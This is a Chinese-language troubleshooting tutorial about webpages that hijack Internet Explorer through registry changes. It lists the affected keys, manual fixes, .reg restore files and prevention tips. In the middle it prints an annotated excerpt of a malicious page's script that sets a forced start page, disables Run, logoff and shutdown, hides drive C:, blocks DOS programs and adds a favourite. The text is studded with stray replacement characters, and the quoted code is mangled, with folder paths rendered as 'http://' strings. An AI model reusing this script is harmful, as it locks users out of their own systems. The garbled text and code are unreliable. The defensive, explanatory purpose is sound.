最近,屢屢發生網友在瀏覽網頁時�����,造成注冊表被修改�,使得IE默認連接首頁�����、標題欄及IE右鍵菜單被改為瀏覽網頁時的地址(多為廣告信息及其它的討厭信息)����,更有甚者使瀏覽者的電腦在啟動時出現一個提示窗口顯示自己的廣告�,并會自動打開很多的網頁,而且有愈演愈烈之勢,尤其在辦公室中��,一不小心便中招�,讓你措手不及,遇到這種情況我們該怎樣辦呢��?
一�����、注冊表被修改的原因及解決辦法
其實,該惡意網頁是含有有害代碼的ActiveX網頁文件�����,這些廣告信息的出現是因為瀏覽者的注冊表被惡意更改的結果����。
1、IE默認連接首頁被修改
IE瀏覽器上方的標題欄被改成“歡迎訪問******網站”的樣式����,這是最常見的篡改手段,受害者眾多���。
受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Start Page
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Start Page
通過修改“Start Page”的鍵值�,來達到修改瀏覽者IE默認連接首頁的目的����,如瀏覽“*****”就會將你的IE默認連接首頁修改為http://ppw.****.com ”,即便是出于給自己的主頁做廣告的目的��,也顯得太霸道了一些�,這也是這類網頁惹人厭惡的原因。
解決辦法:
A.注冊表法:
①在Windows啟動后�,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit���,然后按“確定”鍵��;
②展開注冊表到HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下�����,在右半部分窗口中找到串值“Start Page”雙擊 ����,將Start Page的鍵值改為“about :blank”即可��;
③同理�,展開注冊表到HKEY_CURRENT_USER/Software/MicrosoftInternet Explorer/Main
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法處理����。
④退出注冊表編輯器,重新啟動計算機���,一切OK了�����!
B.特殊例子:當IE的起始頁變成了某些網址后����,就算你通過選項設置修改好了,重啟以后又會變成他們的網址啦���,十分的難纏����。其實他們是在你機器里加了一個自運行程序����,它會在系統啟動時將你的IE起始頁設成他們的網站。
解決辦法:
運行注冊表編輯器regedit.exe�,然后依次展開HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Run主鍵,然后將其下的registry.exe子鍵刪除����,然后刪除自運行程序c:/PRogramFiles/registry.exe,最后從IE選項中重新設置起始頁就好了����。
2、篡改IE的默認頁
有些IE被改了起始頁后�,即使設置了“使用默認頁”仍然無效�����,這是因為IE起始頁的默認頁也被篡改啦。具體說來就是以下注冊表項被修改:HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main/Default_Page_URL“Default_Page_URL”這個子鍵的鍵值即起始頁的默認頁���。
解決辦法:
A.運行注冊表編輯器����,然后展開上述子鍵���,將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了�,或者設置為IE的默認值�。
B.msconfig 有的還是將程序寫入硬盤中,重啟計算機后 首頁設置又被改了回去���,這時可使用“系統配置實用程序”來解決����。開始-運行�����,鍵入msconfig點擊“確定”,在彈出的窗口中切換到“啟動”選項卡�,禁用可疑程序啟動項。
3��、修改IE瀏覽器缺省主頁���,并且鎖定設置項����,禁止用戶更改回來��。主要是修改了注冊表中IE設置的下面這些鍵值(DWord值為1時為不可選):
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel] "Settings"=dword:1
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel] "Links"=dword:1
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]"SecAddSites"=dword:1
解決辦法:
將上面這些DWORD值改為“0”即可恢復功能�。
4、IE的默認首頁灰色按扭不可選
這是由于注冊表HKEY_USERS/DEFAULT/Software/Policies/Microsoft/Internet Explorer/Control Panel下的DWORD值“homepage”的鍵值被修改的緣故�。原來的鍵值為“0”,被修改為“1”(即為灰色不可選狀態)���。
解決辦法:
將“homepage”的鍵值改為“0”即可��。
5�����、IE標題欄被修改
在系統默認狀態下��,是由應用程序本身來提供標題欄的信息�,但也允許用戶自行在上述注冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息���,從而達到改變瀏覽者IE標題欄的目的�。
具體說來受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Window Title
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title
解決辦法:
①在Windows啟動后����,點擊“開始”→“運行”菜單項����,在“打開”欄中鍵入regedit,然后按“確定”鍵�;
②展開注冊表HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分窗口中找到串值“Window Title”�����,將該串值刪除即可�����,或將Window Title的鍵值改為“IE瀏覽器”等你喜歡的名字����;
③同理�,展開注冊表到HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main然后按②中所述方法處理���。
④退出注冊表編輯器��,重新啟動計算機�����,運行IE��,你會發現困擾你的問題解決了��!
6����、IE右鍵菜單被修改
受到修改的注冊表項目為:HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt下被新建了網頁的廣告信息�����,并由此在IE右鍵菜單中出現���!
解決辦法:
打開注冊標編輯器����,找到HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt刪除相關的廣告條文即可,注意不要把下載軟件FlashGet和Netants也刪除掉啊�,這兩個可是“正常”的呀���,除非你不想在IE的右鍵菜單中見到它們�。
7���、IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索���,被篡改后只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站�。
出現這種現象的原因是以下注冊表被修改:
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/CustomizeSearch
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/SearchAssistant
解決辦法:
運行注冊表編輯器�����,依次展開上述子鍵����,將“CustomizeSearch”和“SearchAssis tant”的鍵值改為某個搜索引擎的網址即可。
8��、系統啟動時彈出對話框
受到更改的注冊表項目為: HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的標題�,“LegalNoticeText”是提示框的文本內容。由于它們的存在��,就使得我們每次登陸到Windwos桌面前都出現一個提示窗口���,顯示那些網頁的廣告信息���!你瞧,多討厭?。?
解決辦法:
打開注冊表編輯器�,找到HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogo這一個主鍵,然后在右邊窗口中找到“LegalNoticeCaption”和“LegalNoticeText”這兩個字符串���,刪除這兩個字符串就可以解決在登陸時出現提示框的現象了��。
9��、瀏覽網頁注冊表被禁用
這是由于注冊表HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System下的DWORD值“DisableRegistryTools”被修改為“1”的緣故����,將其鍵值恢復為“0”即可恢復注冊表的使用。
解決辦法
用記事本程序建立以REG為后綴名的文件��,將下面這些內容復制在其中就可以了:
REGEDIT4[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]“DisableRegistryTools”=dword:00000000���。
10����、瀏覽網頁開始菜單被修改
這是最“狠”的一種���,讓瀏覽者有生不如死的感覺���。瀏覽后不僅有類似上面所說的那些癥狀,還會有以下更悲慘的遭遇:
進入該網頁會被:
1.修改開始菜單
1)禁止“關閉系統”
2)禁止“運行”
3)禁止“注銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用注冊表編輯器regedit
4.禁止使用DOS程序
5.使系統無法進入“實模式”
6.禁止運行任何程序
7.將IE瀏覽器的首頁改為http://www.findfeel.com/�����,收藏夾中也被加入該網址�。
那么這些功能恐怖的功能是如何實現的呢�?原來,該網頁是有人利用java技術制作的含有有害代碼的ActiveX網頁文件��。為讓更多的人了解其危害��,我查看了其源代碼,將其主要部分列了出來����,并加了詳細的注釋(文中有“注”字的部分是我加的注釋)。
注:下面代碼是將你的IE默認連接首頁改為http://www.findfeel.com/
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//
Start Page", "http://www.findfeel.com/");
注:以下是該網頁修改受害者的注冊表項所用的招數
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion
//Policies//Explorer//NoRun", 01, "REG_BINARY");
注:使受害者系統沒有“運行”項���,這樣用戶就不能通過注冊表編輯器來修改該有害網頁對系統注冊表的修改����。
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoClose", 01, "REG_BINARY");
注:使受害者系統沒有“關閉系統”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoLogOff", 01, "REG_BINARY");
注:使受害者系統沒有“注銷”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoDrives", "00000004", "REG_DWORD");
注:使受害者系統沒有邏輯驅動器C
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp// Disabled","REG_BINARY");
注:禁止運行所有的DOS應用程序�����;
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies/ /WinOldApp//NoRealMode","REG_BINARY");
注:使系統不能啟動到“實模式”(傳統的DOS模式)下�;
又注:進入該網頁,它還會修改以下的注冊表項���,使WINDOWS系統登錄時顯示一個登錄窗口(在MicroSoft網絡用戶登錄之前)
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeCaption", "嗚啦啦...");
注:這些代碼會使窗口的標題是“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeText", "歡迎你�����!你這個超級無敵大白癡����!《嗚啦啦...》故事開始了,按確定進入悲慘世界");
注:上面一行是會在窗口中顯示出來的文字
注:下面兩行代碼修改注冊表�,使受害者所有的IE窗口都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Internet Explorer//Main//
Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//
Window Title", "嗚啦啦...");
注:到上面一行為止,完成了對受害者的注冊表的所有修改�����!
注:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = fso.GetSpecialFolder(0);
loc = WF + "http://Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "http://Documents and Settings//
" + Net.UserName + "http://Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", "http://www.findfeel.com");
由于代碼很簡單��,又加了注釋���,相信你已經看明白是怎么回事了�。那么如果不小心進入該網頁�,并且已經中招了該怎么辦呢?別急���,下面給你列出了解決的辦法�����。
受害用戶的修復方法:
1:對于Win9x用戶��,建議在電腦啟動時按F8鍵,選擇到MS-DOS方式下���,使用Scanreg/restore命令來恢復以前備份的���、正常的注冊表��。
2:對于Win2000用戶���,把以下內容copy下來,存為unlock.reg文件��,選帶命令行的安全模式����,用命令regedit unlock.reg導入,如何�,重啟機器就OK了。
unlock.reg文件內容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Policies/Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Policies/System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Policies/System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Policies/WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Policies/WinOldApp]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main]
"Window Title"="IE瀏覽器"
[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
"Window Title"="IE瀏覽器"
以上是比較常見的修改瀏覽者注冊表的現象�,今天在瀏覽網頁時,無意中來到某個個人網站��,又遇到了以前沒有碰到過的問題:
11���、IE中鼠標右鍵失效
瀏覽網頁后在IE中鼠標右鍵失效��,點擊右鍵沒有任何反應�����!
12��、查看““源文件”菜單被禁用
在IE窗口中點擊“查看”→“源文件”����,發現“源文件”菜單已經被禁用。
我在瀏覽網頁時并沒有注意到上面這兩個問題����,因為當時正好朋友叫我有事,于是我就退出電腦了�����,晚上吃完飯開啟電腦連線上網����,就發現IE中鼠標右鍵失效,“查看”菜單中的“源文件”被禁用�。不能查看源文件也就罷了,但是無法使用鼠標右鍵真是太不方便了�。得想個辦法!
找出最新版的超級兔子魔法設置試試吧�,呀!不能解決�!看來是個新問題,不過自己好歹也是“老革命”了���,這點問題應該難不住我��。于是到注冊表中一番搜尋�,經過一番查找終于弄明白了問題的所在����。
原來,惡意網頁修改了我的注冊表���,具體的位置為:在注冊表HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explore下建立子鍵“Restrictions”�����,然后在“Restrictions”下面建立兩個DWORD值:“NoViewSource”和“NoBrowserContextMenu”�,并為這兩個DWORD值賦值為“1”�����。
在注冊表HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Restrictions下����,將兩個DWORD值:“NoViewSource”和“NoBrowserContextMenu”的鍵值都改為了“1”���。
通過上面這些鍵值的修改就達到了在IE中使鼠標右鍵失效,使“查看”菜單中的“源文件”被禁用的目的�����。要向你說明的是第2點中提到的注冊表其實相當于第1點中提到的注冊表的分支��,修改第1點中所說的注冊表鍵值����,第2點中注冊表鍵值隨之改變。
解決辦法:
明白了道理�,問題解決起來就容易多了,具體解決辦法為:將以下內容另存為后綴名為reg的注冊表文件�����,比方說unlock.reg���,雙擊unlock.reg導入注冊表�,不用重啟電腦,重新運行IE就會發現IE的功能恢復正常了�。
REGEDIT4
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer
/Restrictions]
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer
/Restrictions]
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
要特別注意的是,在你編制的注冊表文件unlock.reg中��,“REGEDIT4”一定要大寫��,并且它的后面一定要空一行�,還有�,“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄��!許多朋友寫注冊表文件之所以不成功��,就是因為沒有注意到上面所說的內容����,這回該注意點嘍。請注意如果你是Win2000或WinXP用戶����,請將“REGEDIT4”改為Windows Registry Editor Version 5.00。
二��、預防辦法
1����、要避免中招����,關鍵是不要輕易去一些自己并不了解的站點��,特別是那些看上去美麗誘人的網址更不要貿然前往���,否則吃虧的往往是你�。
2���、由于該類網頁是含有有害代碼的ActiveX網頁文件����,因此在IE設置中將ActiveX插件和控件�����、Java腳本等全部禁止就可以避免中招��。
具體方法是:在IE窗口中點擊“工具→Internet選項���,在彈出的對話框中選擇“安全”標簽���,再點擊“自定義級別”按鈕����,就會彈出“安全設置”對話框���,把其中所有ActiveX插件和控件以及Java相關全部選擇“禁用”即可�。不過����,這樣做在以后的網頁瀏覽過程中可能會造成一些正常使用ActiveX的網站無法瀏覽���。唉��,有利就有弊�,你還是自己看著辦吧�����。
3����、對于Windows98用戶,請打開C:/WINDOWS/JAVA/Packages/CVLV1NBB.Zip,把其中的“ActiveXComponent.class”刪掉��;對于WindowsMe用戶��,請打開C:/WINDOWS/JAVA/Packages/5NZVFPF1.ZIP��,把其中的“ActiveXComponent.class”刪掉��。請放心��,刪除這個組件不會影響到你正常瀏覽網頁的�����。
4����、下載超級兔子魔法設置軟件后安裝,如果出現問題�,可以用它來恢復。不過 “兔子”對于我們在上面所說的惡意網頁使得IE中鼠標右鍵失效�����,“查看”菜單中的 “源文件”被禁用這兩種現象無法恢復����。
5�、既然這類網頁是通過修改注冊表來破壞我們的系統����,那么我們可以事先把注冊表加鎖:禁止修改注冊表,這樣就可以達到預防的目的�����。不過�����,自己要使用注冊表編輯器regedit.exe該怎么辦呢����?因此我們還要在此前事先準備一把“鑰匙”�,以便打開這把“鎖”!
加鎖方法如下:
(1)運行注冊表編輯器regedit.exe��;
(2)展開注冊表到HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System下���,新建一個名為DisableRegistryTools的DWORD值����,并將其值改為“1”,即可禁止使用注冊表編輯器regedit.exe��。
解鎖方法如下:
用記事本編輯一個任意名字的.reg文件���,比如unlock.reg��,內容如下: REGEDIT4[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]“DisableRegistryTools”=dword:00000000存盤�����,你就有了一把解鎖的鑰匙了����!如果要使用注冊表編輯器��,則雙擊unlock.reg即可����。請注意如果你是Win2000或WinXP用戶,請將“REGEDIT4”寫為Windows RegistryEditor Version 5.00�。
6、對Win2000用戶���,還可以通過在Win2000下把服務里面的遠程注冊表操作服務“Remote Registry Service”禁用��,來對付該類網頁���。具體方法是:點擊“管理工具→服務→Remote Registry Service(允許遠程注冊表操作)”�����,將這一項禁用即可�。
7��、如果覺得手動修改注冊表太危險�,可以下載如下reg文件,雙擊之可恢復被修改的注冊表�����。
8�����、雖然經過一番辛苦的勞動修改回了標題和默認連接首頁�����,但如果以后又不小心進入該站就又得麻煩一次�。其實,你可以在IE中做一些設置以便永遠不進該站點:打開IE�,點擊“工具”→“Internet選項”→“內容”→“分級審查”,點“啟用”按鈕���,會調出“分級審查”對話框���,然后點擊“許可站點”標簽,輸入不想去的網站網址�,如輸入:http://***.****.com,按“從不”按鈕�����,再點擊“確定”即大功告成���。
